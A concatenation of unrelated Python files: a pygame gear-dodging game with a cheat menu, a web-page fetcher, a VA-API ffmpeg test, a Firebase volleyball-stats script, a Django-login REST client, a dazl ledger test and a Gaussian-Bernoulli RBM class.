self.image.fill(WHITE)
#self.rect = self.image.get_rect
#self.rect.left = width/len(players)
#self.rect.top = height/2 + 150
screen.blit(self.image, (width/len(players)- 100, height/2 + 80))
dis = width/(len(players)+0)
for g in range(0,len(players)):
self.textSurface = myfont.render("Player " + str((g+1)), False, BLACK)
screen.blit(self.textSurface,(dis,(height/2) + 100))
self.image = pygame.image.load(os.path.join(MySpritesFolder, players[g])).convert()
self.image.set_colorkey(WHITE)
self.rect = self.image.get_rect()
self.rect.top = (height / 2) + 150
self.rect.x = dis
screen.blit(self.image, self.rect)
dis += width/(len(players)+0)
self.keystate = pygame.key.get_pressed()
keys = [pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6, pygame.K_7, pygame.K_8, pygame.K_9, pygame.K_0]
for com in range(len(keys)):
if self.keystate[keys[com]]:
global playerNum
playerNum = com
print(str(playerNum))
homeScreenMode.remove(True)
time.sleep(0.5)
Level.nextLevel()
#---------------------------------PLAYER CLASS-----------------------PLAYER CLASS----------------------------------
class Player(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
#ALL IMAGES ARE 120x146 pixels or 120x114 or 120x150
self.image = pygame.image.load(os.path.join(MySpritesFolder, players[playerNum])).convert()
self.image.set_colorkey(WHITE)
self.rect = self.image.get_rect()
self.radius = int(self.rect.width * .85 / 2)
self.rect.top = height / 2
self.rect.left = width - 50
def update(self):
self.speedx = 0
self.speedy = 0
self.keystate = pygame.key.get_pressed()
global playerSpeed
keys = [pygame.K_LEFT, pygame.K_RIGHT, pygame.K_a, pygame.K_d, pygame.K_UP, pygame.K_DOWN, pygame.K_w, pygame.K_s]
for a in range(len(keys)):
if self.keystate[keys[a]] and a < len(keys)/2:
if (a % 2) == 0:
self.speedx = playerSpeed * -1
if (a % 2) == 1:
self.speedx = playerSpeed
if self.keystate[keys[a]] and a >= len(keys)/2:
if (a % 2) == 0:
self.speedy = playerSpeed * -1
if (a % 2) == 1:
self.speedy = playerSpeed
self.rect.x += self.speedx
self.rect.y += self.speedy
if self.rect.right > width:
self.rect.right = width
if self.rect.left < 0:
self.rect.left = 0
if self.rect.top < 0:
self.rect.top = 0
if self.rect.bottom > height:
self.rect.bottom = height
#---------------------------------BALL CLASS-----------------------BALL CLASS----------------------------------
class Ball(pygame.sprite.Sprite):
def __init__(self, speed):
pygame.sprite.Sprite.__init__(self)
num = random.randrange(0, len(gear))
self.image_orig = pygame.image.load(os.path.join(MySpritesFolder, gear[num])).convert()
self.image_orig.set_colorkey(WHITE)
self.image = self.image_orig.copy()
self.rect = self.image.get_rect()
self.radius = int(self.rect.width * .85 / 2)
self.cirRadius = random.randint(70, 400)
global scoreModifier
for d in range(0, int(len(gear)/2)):
if num == d:
scoreModifier += 25
print("Score Big Modified")
for d in range(int(len(gear)/2), len(gear)):
if num == d:
scoreModifier += 15
print("Score Small Modified")
self.smoothness = random.randint(3, 20)
if self.smoothness > 8 and self.smoothness < 11:
scoreModifier += 18
if self.smoothness > 11:
scoreModifier += 28
self.rect_x = []
self.rect_y = []
self.change_x = []
self.change_y = []
self.turn = 1
self.cp_x = random.randint(50, width / 2)
self.cp_y = random.randint(10, height - 10)
print("Check 1")
for count in range(0, 4):
for z in range(0,4):
if self.turn > 0 and self.turn <= 4:
self.rect_x.append(self.cp_x - (math.cos(math.radians(angle[z])) * self.cirRadius))
self.rect_y.append(self.cp_y + (math.sin(math.radians(angle[z])) * self.cirRadius))
if self.turn > 4 and self.turn <= 8:
self.rect_x.append(self.cp_x + (math.cos(math.radians(angle[z+4])) * self.cirRadius))
self.rect_y.append(self.cp_y + (math.sin(math.radians(angle[z+4])) * self.cirRadius))
if self.turn > 8 and self.turn <= 12:
self.rect_x.append(self.cp_x + (math.cos(math.radians(angle[z])) * self.cirRadius))
self.rect_y.append(self.cp_y - (math.sin(math.radians(angle[z])) * self.cirRadius))
if self.turn > 12 and self.turn <= 16:
self.rect_x.append(self.cp_x - (math.cos(math.radians(angle[z+4])) * self.cirRadius))
self.rect_y.append(self.cp_y - (math.sin(math.radians(angle[z+4])) * self.cirRadius))
self.turn += 1
self.rect_x.append(self.rect_x[0])
self.rect_y.append(self.rect_y[0])
print("Check 2")
for c in range(0, 16):
self.change_x.append(((self.rect_x[c+1] - self.rect_x[c]) / self.smoothness) * speed)
self.change_y.append(((self.rect_y[c+1] - self.rect_y[c]) / self.smoothness) * speed)
print(str(speed))
print("Check 3")
self.gear_x = self.rect_x[0]
self.gear_y = self.rect_y[0]
self.number = 0
#Rotation Stuff
self.rot = 0
self.rot_speed = random.randrange(-30, 30)
self.last_update = pygame.time.get_ticks()
def rotate(self):
now = pygame.time.get_ticks()
if now - self.last_update > 50: #In milliseconds
self.last_update = now
self.rot = (self.rot + self.rot_speed) % 360
new_image = pygame.transform.rotate(self.image_orig, self.rot)
old_center = self.rect.center
self.image = new_image
self.rect = self.image.get_rect()
self.rect.center = old_center
def update(self):
self.rotate()
global ballSpeed
self.gear_x += self.change_x[self.number] / ballSpeed
self.gear_y += self.change_y[self.number] / ballSpeed
self.rect.x = self.gear_x
self.rect.y = self.gear_y
if self.number <= 4 and self.number >= 0:
if self.gear_x >= self.rect_x[self.number + 1] and self.gear_y >= self.rect_y[self.number + 1]:
self.number += 1
if self.number <= 9 and self.number > 4:
if self.gear_x >= self.rect_x[self.number + 1] and self.gear_y <= self.rect_y[self.number + 1]:
self.number += 1
if self.number <= 13 and self.number > 9:
if self.gear_x <= self.rect_x[self.number + 1] and self.gear_y <= self.rect_y[self.number + 1]:
self.number += 1
if self.number <= 16 and self.number > 13:
if self.gear_x <= self.rect_x[self.number + 1] and self.gear_y >= self.rect_y[self.number + 1]:
self.number += 1
if self.number >= 16:
self.number = 0
self.gear_x = self.rect_x[0]
self.gear_y = self.rect_y[0]
#print("UPDATE")
#---------------------------------LEVEL CLASS-----------------------LEVEL CLASS----------------------------------
class Level(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
def nextLevel(self):
global levelNum
levelNum += 1
print("Done" + str(levelNum))
global speed1
global speed2
speed1 += 10
speed2 += 10
print(speed1)
print(speed2)
global playerSpeed
if levelNum > 11:
playerSpeed += 0.5
global backNum
backNum = random.randrange(0, len(back))
#background_rect = self.background.get_rect()
global clicked
speed = float(decimal.Decimal(random.randrange(speed1, speed2))/100)
global scoreModifier
global score
print("Speed " + str(speed))
if speed > 0.4:
scoreModifier += int(45 * speed)
print("Speed Modifier " + str(int(45*speed)))
score += scoreModifier
b = Ball(speed)
all_sprites.add(b)
balls.add(b)
Player.__init__()
def nextBack(self):
self.background = pygame.image.load(os.path.join(MySpritesFolder, back[0])).convert_alpha()
self.back_rect = self.background.get_rect()
screen.blit(self.background, self.back_rect)
#def nextLevel(self):
#---------------------------------LEVEL DOOR CLASS-----------------------LEVEL DOOR CLASS----------------------------------
class levelDoor(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(os.path.join(MySpritesFolder, "levelDoor.jpg")).convert()
self.image.set_colorkey(WHITE)
self.rect = self.image.get_rect()
self.rect.top = doorHeight
self.rect.x = 100
self.radius = int(self.rect.width * .85 / 2)
textSurface = myfont.render("Level " + str(levelNum), False, BLACK)
screen.blit(textSurface,(width/2 - 50,height / 100))
#screen.blit(self.doorLevel, self.doorLevelRect)
#all_sprites.add(levelDoor())
#---------------------------------GAME OVER CLASS-----------------------GAME OVER CLASS----------------------------------
class gameOver(pygame.sprite.Sprite):
def __init__(self):
global levelNum
self.textSurface = myfont.render("Game Over", False, BLACK)
screen.blit(self.textSurface,(width/2,height/2))
self.textSurface = myfont.render("You made it to level " + str(levelNum), False, BLACK)
screen.blit(self.textSurface,(width/2,height/2 + 100))
self.textSurface = myfont.render("Press R to Retry", False, BLACK)
screen.blit(self.textSurface,(width/2,height/2 + 200))
#global levelNum
global speed
global speed1
global speed2
global playerNum
global playerSpeed
global beforeSpeed
global gear
global ballSpeed
global score
global scoreModifier
score = 0
scoreModifier = 50
ballSpeed = 1
playerSpeed = beforeSpeed
levelNum = 0
speed = 0
speed1 = 10
speed2 = 20
gear = ["gear.png", "gear1.png", "gear2.png", "gear3.png", "gear4.png", "gear5.png", "gear6.png"]
all_sprites.remove(balls)
balls.remove(balls)
playerNum = 0
#---------------------------------HIGH SCORE CLASS-----------------------HIGH SCORE CLASS----------------------------------
class highScore(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
global highscore
self.textSurface = myfont.render("HighScore: " + str(highscore), False, BLACK)
screen.blit(self.textSurface,(width/2 + (width/5), height/100))
global score
self.textSurface = myfont.render("Score: " + str(score), False, BLACK)
screen.blit(self.textSurface,(width/2 - ((width/5)+100), height/100))
def update(self):
global highscore
global levelNum
if score > highscore:
highscore += 1
#---------------------------------CHEATS CLASS-----------------------CHEATS CLASS----------------------------------
class cheats(pygame.sprite.Sprite):
def update(self):
pygame.sprite.Sprite.update(self)
self.keystate = pygame.key.get_pressed()
global clicked
global playerSpeed
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_l] and clicked==False:
Level.nextLevel()
time.sleep(0.150)
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_c]:
all_sprites.remove(balls)
balls.remove(balls)
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_e]:
playerSpeed += 0.5
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_q]:
playerSpeed -= 0.5
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_r]:
playerSpeed = beforeSpeed
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_t]:
global gear
gear = ["gear5.png", "gear6.png"]
all_sprites.remove(balls)
amtBalls = len(balls)
balls.remove(balls)
global speed1
global speed2
global speed
global b
for ba in range(amtBalls):
speed = float(decimal.Decimal(random.randrange(speed1, speed2))/100)
b = Ball(speed)
all_sprites.add(b)
balls.add(b)
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_f]:
global ballSpeed
ballSpeed += 0.2
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_g]:
# global ballSpeed
ballSpeed -= 0.05
if ballSpeed <= 0:
ballSpeed = 1
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_h]:
# global ballSpeed
ballSpeed = 1
if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_m]:
self.textSurface = myfont.render("Cheat Menu:", False, BLACK)
screen.blit(self.textSurface,(10,0))
self.textSurface = myfont.render("CTRL + L: Next Level", False, BLACK)
screen.blit(self.textSurface,(10,50))
self.textSurface = myfont.render("CTRL + C: Clear Gears", False, BLACK)
screen.blit(self.textSurface,(10,100))
self.textSurface = myfont.render("CTRL + E/Q/R: Increase/Decrease/Default Player Speed", False, BLACK)
screen.blit(self.textSurface,(10,150))
self.textSurface = myfont.render("CTRL + T: All Gears Small", False, BLACK)
screen.blit(self.textSurface,(10,200))
self.textSurface = myfont.render("CTRL + F/G/H: Decrease/Increase/Default Gear Speed", False, BLACK)
screen.blit(self.textSurface,(10,250))
all_sprites = pygame.sprite.Group()
#balls = pygame.sprite.Group()
homescreen = pygame.sprite.Group()
highscores = pygame.sprite.Group()
balls = pygame.sprite.Group()
levels = pygame.sprite.Group()
levelDoors = pygame.sprite.Group()
l = levelDoor()
levelDoors.add(l)
all_sprites.add(l)
Player = Player()
Level = Level()
gameOver = gameOver()
all_sprites.add(Player)
h = highScore()
c = cheats()
#all_sprites.add(c)
#all_sprites.add(h)
##all_sprites.add(gameOver)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
running = False
if homeScreenMode[0]:
if pickPlayer[0]:
homescreen.choosePlayer()
else:
homeScreen()
homescreen = homeScreen()
homescreen.update()
if homeScreenMode[0] == False:
screen.fill(WHITE)
#Level.nextBack()
l.__init__()
h.__init__()
h.update()
all_sprites.update()
c.update()
hits = pygame.sprite.spritecollide(Player, balls, False, pygame.sprite.collide_circle)
if hits:
gameOver.__init__()
time.sleep(2)
homeScreenMode = [True, False]
pickPlayer =[False, True]
#running = False
hitDoor = pygame.sprite.spritecollide(Player, levelDoors, pygame.sprite.collide_circle, pygame.sprite.collide_circle)
if hitDoor:
Level.nextLevel()
all_sprites.draw(screen)
Clock.tick(FPS)
pygame.display.flip()
pygame.quit()
|
from django.urls import path
from users import views as user_views
app_name = 'users'
urlpatterns = [
]
|
"""This is module for fetching the source code of a page when provided
with a url, this module uses request module. Using this module you
can get the html text of page or binary response depending upon
your requirements. This module also keep track of the url of page you
are accessing, (this can be used to check any redirection) which can
accessed by calling get_base_url or get_base_hostname method. This
module handles exceptions thrown by request module and comes with
stand by support mechanism in case of network failure"""
from urlparse import urlparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from retrying import retry
import eventlet
class GetSource:
def __init__(self):
self.base_url = None
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
eventlet.monkey_patch()
def get_base_url(self):
return self.base_url
def get_base_hostname(self):
return urlparse(self.base_url).hostname
@staticmethod
def set_header():
hdr = {'User-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:12.0)'
' Gecko/20100101 Firefox/21.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;'
'q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1, utf-8; q=0.7,*; q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8'}
return hdr
@retry(wait_random_min=2000, wait_random_max=10000)
def wait_for_connection(self):
with eventlet.Timeout(10, False):
test = requests.get('http://216.58.197.46',
timeout=5, verify=False)
test.raise_for_status()
print "\nResuming\n"
return
# retry if HTTP error or connection error occurs
# delay between consecutive retries is between 5 to 10 seconds
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_text(self, url):
hdr = GetSource.set_header()
html_file = None
try:
with eventlet.Timeout(10, False):
html_file = requests.get(url, headers=hdr, verify=False)
if html_file is None:
raise requests.RequestException()
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
# openSSL can be used to bypass the SSL layer
print "SSLError exception caught"
return None
except AttributeError:
pass
except requests.exceptions.ConnectionError:
# checking for bad connection
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
if html_file is not None:
return html_file.text
else:
return None
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_binary_response(self, url):
hdr = GetSource.set_header()
html_file = None
try:
html_file = None
with eventlet.Timeout(10, False):
html_file = requests.get(url, headers=hdr, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
# openSSL can be used to deal with SSL Error
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.content
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_text_with_params(self, url, payload):
# this method send requests with parameters in query to particular URL
# payloads is a dictionary comprising of key value pair
html_file = None
hdr = GetSource.set_header()
try:
with eventlet.Timeout(10, False):
html_file = requests.get(
url, headers=hdr, params=payload, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.text
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_binary_with_params(self, url, payload):
html_file = None
hdr = GetSource.set_header()
try:
with eventlet.Timeout(10, False):
html_file = requests.get(
url, headers=hdr, params=payload, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.content
|
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
spec = load_test_spec("vpp", "deinterlace")
@slash.requires(have_ffmpeg)
@slash.requires(have_ffmpeg_vaapi_accel)
@slash.requires(*have_ffmpeg_filter("deinterlace_vaapi"))
@slash.parametrize(*gen_vpp_deinterlace_parameters(spec, ["bob", "weave", "motion-adaptive", "motion-compensated"]))
@platform_tags(VPP_PLATFORMS)
def test_default(case, method):
params = spec[case].copy()
params.update(
method = map_deinterlace_method(method),
mformat = mapformat(params["format"]),
tff = params.get("tff", 1))
if params["method"] is None:
slash.skip_test("{} method not supported".format(method))
params["decoded"] = get_media()._test_artifact(
"{}_deinterlace_{method}_{format}_{width}x{height}"
".yuv".format(case, **params))
if params["mformat"] is None:
slash.skip_test("{format} format not supported".format(**params))
call(
"ffmpeg -hwaccel vaapi -vaapi_device /dev/dri/renderD128 -v debug"
" -f rawvideo -pix_fmt {mformat} -s:v {width}x{height} -top {tff}"
" -i {source} -vf 'format=nv12,hwupload,deinterlace_vaapi=mode={method}"
":rate=field,hwdownload,format=nv12'"
" -pix_fmt {mformat} -vframes {frames} -y {decoded}".format(**params))
params.setdefault("metric", dict(type = "md5"))
check_metric(**params)
|
from readCSV import hashData, addToHash
from firebase import firebase
import operator
import itertools
firebase = firebase.FirebaseApplication('https://statgen-993f4.firebaseio.com/')
kills = 4
errors = 6
assists = 9
aces = 11
digs = 13
blocksSolo = 15
blocksAss = 16
# Each teams hashtable
calgaryRoster = hashData("calgaryData.csv")
trinityWesternRoster = hashData("trinityWesternData.csv")
albertaRoster = hashData("albertaData.csv")
brandonRoster = hashData("brandonData.csv")
grantMacewanRoster = hashData("macewanData.csv")
manitobaRoster = hashData("manitobaData.csv")
mountRoyalRoster = hashData("mountRoyalData.csv")
saskatchewanRoster = hashData("saskatchewanData.csv")
thompsonRiversRoster = hashData("thompsonRiversData.csv")
ubcRoster = hashData("ubcData.csv")
ubcOkanaganRoster = hashData("ubcOkanaganData.csv")
winnipegRoster = hashData("winnipegData.csv")
teams = [calgaryRoster,trinityWesternRoster,albertaRoster,brandonRoster,grantMacewanRoster,manitobaRoster
,mountRoyalRoster,saskatchewanRoster,thompsonRiversRoster,ubcRoster,ubcOkanaganRoster,winnipegRoster]
def calcStatsList(schoolRoster, playerName):
#print(schoolRoster)
# Checks if the team roster has the players year listed or not.
# If the year is listed, the position will be index [1]. If the
# name is not listed, the position will be index[0].
if (schoolRoster[playerName][1] == 'f') and not(isinstance(schoolRoster[playerName][2],int)) and (schoolRoster[playerName][2] != "-"):
playerPosition = schoolRoster[playerName][2]
killsTOT = (schoolRoster[playerName][kills+1])
assistsTOT = (schoolRoster[playerName][assists+1])
acesTOT = (schoolRoster[playerName][aces+1])
digsTOT = (schoolRoster[playerName][digs+1])
blocksSoloTOT = (schoolRoster[playerName][blocksSolo+1])
blocksAssistsTOT = (schoolRoster[playerName][blocksAss+1])
errorsTOT = (schoolRoster[playerName][errors+1])
elif schoolRoster[playerName][1] == 'f':
playerPosition = (schoolRoster[playerName][0])
killsTOT = (schoolRoster[playerName][kills])
assistsTOT = (schoolRoster[playerName][assists])
acesTOT = (schoolRoster[playerName][aces])
digsTOT = (schoolRoster[playerName][digs])
blocksSoloTOT = (schoolRoster[playerName][blocksSolo])
blocksAssistsTOT = (schoolRoster[playerName][blocksAss])
errorsTOT = (schoolRoster[playerName][errors])
else:
playerPosition = (schoolRoster[playerName][1])
killsTOT = (schoolRoster[playerName][kills])
assistsTOT = (schoolRoster[playerName][assists])
acesTOT = (schoolRoster[playerName][aces])
digsTOT = (schoolRoster[playerName][digs])
blocksSoloTOT = (schoolRoster[playerName][blocksSolo])
blocksAssistsTOT = (schoolRoster[playerName][blocksAss])
errorsTOT = (schoolRoster[playerName][errors])
# print(playerName,schoolRoster[playerName])
allStats = [killsTOT, assistsTOT, acesTOT, digsTOT, blocksSoloTOT, blocksAssistsTOT, errorsTOT, playerPosition]
return allStats
def putData():
schools = ['UC','TWU','UAB','BU','GMU','MAN','MRU','SASK','TRU','UBC','UBCO','WPG']
for school, roster in zip(schools, teams):
for player in roster:
try:
playerStats = calcStatsList(roster, player)
#print(player, playerStats)
# result =firebase.put(('/playerData/'+school), player, {'position':str(playerStats[7]),'killsTOT':str(playerStats[0]),'assistsTOT':str(playerStats[1]),'acesTOT':str(playerStats[2]),\
# 'digsTOT': str(playerStats[3]), 'blocks soloTOT': str(playerStats[4]), 'blocks assistsTOT': str(playerStats[5]), 'errorsTOT': str(playerStats[6])})
except TypeError:
pass
putData()
|
import base64
import httplib2
import logging
import mimetypes
import mimetools
import urllib, urllib2
import cookielib
import urlparse
import os, time, stat
import getpass
HTTP_STATUS_OK = '200'
logger = logging.getLogger(__name__)
class RestClient(object):
content_type = None
def __init__(self, base_url, username=None, password=None,
connection_class=None, **kwargs):
if connection_class is None:
connection_class = Connection
self._connection = connection_class(base_url, username, password,
**kwargs)
def get(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'get', args=args, data=data,
headers=headers)
def put(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'put', args=args, data=data,
headers=headers)
def delete(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'delete', args=args, data=data,
headers=headers)
def post(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'post', args=args, data=data,
headers=headers)
def _request(self, resource, method, args=None, data=None, headers=None):
response_data = None
request_body = self._serialize(data)
try:
response = self._connection.request(resource, method, args=args,
body=request_body, headers=headers,
content_type=self.content_type)
response_content = response.read()
except Exception as e:
if (hasattr(e,"code") and e.code == 403):
if (os.path.isfile(os.path.expanduser("~/.ocu"))):
os.remove(os.path.expanduser("~/.ocu"))
raise e
response_headers = response.info().items()
if response.code == 200:
response_data = self._deserialize(response_content)
return Response(response_headers, response_content, response_data,status_code=response.code)
def _serialize(self, data):
return unicode(data)
def _deserialize(self, data):
return unicode(data)
class JsonRestClient(RestClient):
content_type = 'application/json'
def _serialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.dumps(data)
return None
def _deserialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.loads(data)
return None
class XmlRestClient(RestClient):
content_type = 'text/xml'
class Response(object):
def __init__(self, headers, content, data, status_code=500):
self.headers = headers
self.content = content
self.data = data
self.status_code = int(status_code)
def __repr__(self):
return '<Response %s: %s>' % (self.status_code, self.__dict__)
class BaseConnection(object):
def __init__(self, base_url, username=None, password=None):
self.base_url = base_url
self.username = username
self.password = password
self.url = urlparse.urlparse(base_url)
(scheme, netloc, path, query, fragment) = urlparse.urlsplit(base_url)
self.scheme = scheme
self.host = netloc
self.path = path
def _get_content_type(self, filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def request(self, resource, method="get", args=None, body=None,
headers=None, content_type=None):
raise NotImplementedError
class Connection(BaseConnection):
_headers={}
_csrf_token = None
_token = None
_login_url = None
def __init__(self, *args, **kwargs):
cache = kwargs.pop('cache', None)
timeout = kwargs.pop('cache', None)
proxy_info = kwargs.pop('proxy_info', None)
login_url = kwargs.pop('login_url', None)
self._login_url = login_url
token = kwargs.pop('token', None)
super(Connection, self).__init__(*args, **kwargs)
#remove cookie if it's older than an hour
if (os.path.isfile(os.path.expanduser("~/.ocu"))
and (time.time() - os.stat(os.path.expanduser("~/.ocu"))[stat.ST_MTIME]) > 3600):
os.remove(os.path.expanduser("~/.ocu"))
cj = cookielib.LWPCookieJar()
if (login_url and os.path.isfile(os.path.expanduser("~/.ocu"))):
cj.load(os.path.expanduser("~/.ocu"))
self._conn = urllib2.build_opener(
urllib2.HTTPCookieProcessor(cj)
,urllib2.HTTPRedirectHandler()
,urllib2.HTTPHandler(debuglevel=0)
)
#API token
if (token):
self._token = token
if (login_url and not os.path.isfile(os.path.expanduser("~/.ocu"))):
username = getpass.getuser()
password = getpass.getpass()
from lxml import html
login_form = self._conn.open(login_url).read()
self._csrf_token = html.fromstring(login_form).xpath(
'//input[@name="csrfmiddlewaretoken"]/@value')[0]
values = {
'this_is_the_login_form': 1,
'username': username,
'password': password,
'csrfmiddlewaretoken': self._csrf_token,
'next': '/admin/'
}
params = urllib.urlencode(values)
req = urllib2.Request(login_url, params)
req.add_header('Referer', login_url)
#print("{0} {1}".format(login_url, params))
try:
#login_page = self._conn.open(login_url, params)
login_page = self._conn.open(req)
except Exception as e:
import traceback
print traceback.print_exc()
cj.save(os.path.expanduser("~/.ocu"))
os.chmod(os.path.expanduser("~/.ocu"),0600)
else:
for i in cj:
if (i.name == "csrftoken"):
self._csrf_token = i.value
def request(self, resource, method, args=None, body=None, headers=None,
content_type=None):
if headers is None:
headers = {}
if (self._headers):
headers = dict(headers.items() + self._headers.items())
params = None
path = resource
headers['User-Agent'] = 'Basic Agent'
BOUNDARY = mimetools.choose_boundary()
CRLF = u'\r\n'
if body:
if not headers.get('Content-Type', None):
headers['Content-Type'] = content_type or 'text/plain'
headers['Content-Length'] = str(len(body))
else:
if 'Content-Length' in headers:
del headers['Content-Length']
headers['Content-Type'] = 'text/plain'
if args:
if (self._token):
args["token"] = self._token
if method == "get":
path += u"?" + urllib.urlencode(args)
elif method == "put" or method == "post":
if (isinstance(args, dict) and self._csrf_token):
headers["X-CSRFToken"] = self._csrf_token
#args["csrfmiddlewaretoken"] = self._csrf_token
headers['Content-Type'] = \
'application/x-www-form-urlencoded'
body = urllib.urlencode(args)
if (method == "delete"):
headers["X-CSRFToken"] = self._csrf_token
if (method == "post"):
headers["X-CSRFToken"] = self._csrf_token
headers['Referer'] = self._login_url
request_path = []
# Normalise the / in the url path
if self.path != "/":
if self.path.endswith('/'):
request_path.append(self.path[:-1])
else:
request_path.append(self.path)
if path.startswith('/'):
request_path.append(path[1:])
else:
request_path.append(path)
url = u"%s://%s%s" % (self.scheme, self.host,u'/'.join(request_path))
request = urllib2.Request(url,headers=headers,data=body)
if (method == "delete"):
request.get_method = lambda: 'DELETE'
if (self._token):
request.add_header("X-Auth-Token", "{0}".format(self._token))
return self._conn.open(request)
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
from __future__ import annotations
from asyncio import ensure_future, gather, sleep
from typing import Sequence
import dazl
from dazl.ledger import CreateEvent
from dazl.ledger.aio import Connection
from dazl.prim import ContractData, Party
from dazl.testing import SandboxLauncher
import pytest
from tests.unit import dars
TEMPLATE = "Simple:OperatorNotification"
def payload(operator: Party, text: str) -> ContractData:
return {"operator": operator, "theObservers": [], "text": text}
@pytest.mark.asyncio
async def test_stream_with_initial_state_and_early_punchout(sandbox: SandboxLauncher) -> None:
async with dazl.connect(url=sandbox.url, admin=True) as conn:
party_info, _ = await gather(
conn.allocate_party(), conn.upload_package(dars.Simple.read_bytes())
)
# start a separate coroutine for injecting data into the ledger
async with dazl.connect(url=sandbox.url, act_as=party_info.party) as conn:
texts = ["Red", "Red", "Green", "Blue", "Blue", "Blue"]
for text in texts:
await conn.create(TEMPLATE, payload(party_info.party, text))
some_texts = await first_three(conn)
assert some_texts == texts[:3]
@pytest.mark.asyncio
async def test_stream_with_no_initial_state_and_early_punchout(sandbox: SandboxLauncher) -> None:
async with dazl.connect(url=sandbox.url, admin=True) as conn:
party_info, _ = await gather(
conn.allocate_party(), conn.upload_package(dars.Simple.read_bytes())
)
async with dazl.connect(url=sandbox.url, act_as=party_info.party) as conn:
# kick off the scanning of three elements _before_ the ledger has any data in it
fut = ensure_future(first_three(conn))
# continue onwards, injecting data into the ledger
texts = ["Red", "Red", "Green", "Blue", "Blue", "Blue"]
for text in texts:
await conn.create(TEMPLATE, payload(party_info.party, text))
await sleep(0.1)
some_texts = await fut
assert some_texts == texts[:3]
async def first_three(conn: Connection) -> Sequence[CreateEvent]:
events = []
async with conn.stream(TEMPLATE) as stream:
async for event in stream.creates():
events.append(event.payload["text"])
if len(events) == 3:
# punch out of the stream before we've consumed everything;
# this should cleanly abort the stream
return events
raise AssertionError("did not receive three events")
|
import numpy as np
class gbrbm:
def __init__(self, visible = 0, hidden = 0,
weights = 0.1, vbias = 0, stddev = 0.25, hbias = 0,
adjacency_matrix = None, create_plots = False):
# get dimensions (number of visible and hidden units)
if hasattr(adjacency_matrix, 'shape'):
visible = adjacency_matrix.shape[0]
hidden = adjacency_matrix.shape[1]
if not (visible > 0 and hidden > 0):
print "gbrbm.__init__: number of visible and hidden units have to be > 0"
quit()
# initialize adjacency matrix
# dimensions (visible, hidden)
if hasattr(adjacency_matrix, 'shape') \
and adjacency_matrix.shape == (visible, hidden):
self.A = adjacency_matrix
else:
self.A = np.ones((visible, hidden))
# initialize weight matrix
# dimensions (visible, hidden)
if hasattr(weights, 'shape') \
and weights.shape == (visible, hidden):
self.W = weights
else:
self.W = weights * np.random.randn(visible, hidden)
# initialize bias of visible units
# dimensions (1, visible)
try:
vbias *= np.ones((1, visible))
self.v_bias = vbias
except:
print "gbrbm.__init__: param 'vbias' has no valid dimension (1 x visible)"
quit()
# initialize bias of hidden units
# dimensions (1, hidden)
try:
hbias *= np.ones((1, hidden))
self.h_bias = hbias
except:
print "gbrbm.__init__: param 'hbias' has no valid dimension (1 x hidden)"
quit()
# initialize logarithmic variance of visible units
# dimensions (1, visible)
try:
stddev *= np.ones((1, visible))
self.v_lvar = np.log(stddev ** 2)
except:
print "gbrbm.__init__: param 'stddev' has no valid dimension (1 x visible)"
quit()
# initialize arrays for plots
self.create_plots = create_plots
self.plot = {}
if create_plots:
self.plot['x'] = np.empty(1)
self.plot['Energy'] = np.empty(1)
